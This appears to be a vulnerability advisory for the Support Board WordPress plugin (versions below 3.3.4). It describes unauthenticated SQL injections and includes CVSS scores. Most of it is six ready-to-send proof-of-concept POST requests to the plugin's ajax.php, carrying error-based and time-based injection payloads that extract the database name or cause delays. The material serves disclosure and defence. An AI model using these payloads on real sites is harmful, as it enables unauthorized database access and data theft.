John Jefferson LiWPEX-ID:CCF293EC-7607-412B-B662-5E237B8690CASupport Board < 3.3.4 - Multiple Unauthenticated SQL Injections
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
The plugin does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.
The login-cookie parameter is needed, but does not require to be logged in.
----- PoC 1: Error Based SQLi (status_code) -----
Request
POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: status_code (POST)
function=new-conversation&status_code=2"+AND+EXTRACTVALUE(4597,CONCAT("","DB+Name:+",(SELECT+(ELT(4597=4597,""))),database()))+AND+"fKoo"="fKoo&title=&department=&agent_id=&routing=false&login-cookie=&user_id=46&language=false
----- PoC 2: Error Based SQLi (department)-----
Request
POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: department (POST)
function=new-conversation&status_code=2o&title=&department=(UPDATEXML(5632,CONCAT(0x2e,"Database+Name:+",(SELECT+(ELT(5632=5632,""))),database()),3004))&agent_id=&routing=false&login-cookie=&user_id=46&language=false
----- PoC 3: Error Based SQLi (user_id) -----
Request
POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: user_id (POST)
function=send-message&user_id=-5"+AND+GTID_SUBSET(CONCAT("Database+Name:+",(SELECT+(ELT(3919=3919,""))),database()),3919)+AND+"wrOJ"="wrOJ&conversation_id=35&message=TEST+POC&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false
----- PoC 4: Time Based SQLi (conversation_id)-----
Request
POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: conversation_id (POST)
function=send-message&user_id=5&conversation_id=45"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false
----- PoC 5: Time Based SQLi (conversation_status_code)-----
Request
POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: conversation_status_code (POST)
function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue=false&payload=false&recipient_id=false&login-cookie=&language=false
----- PoC 6: Time Based SQLi (recipient_id)-----
Request
POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: recipient_id (POST)
function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie=&language=falseRelated
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P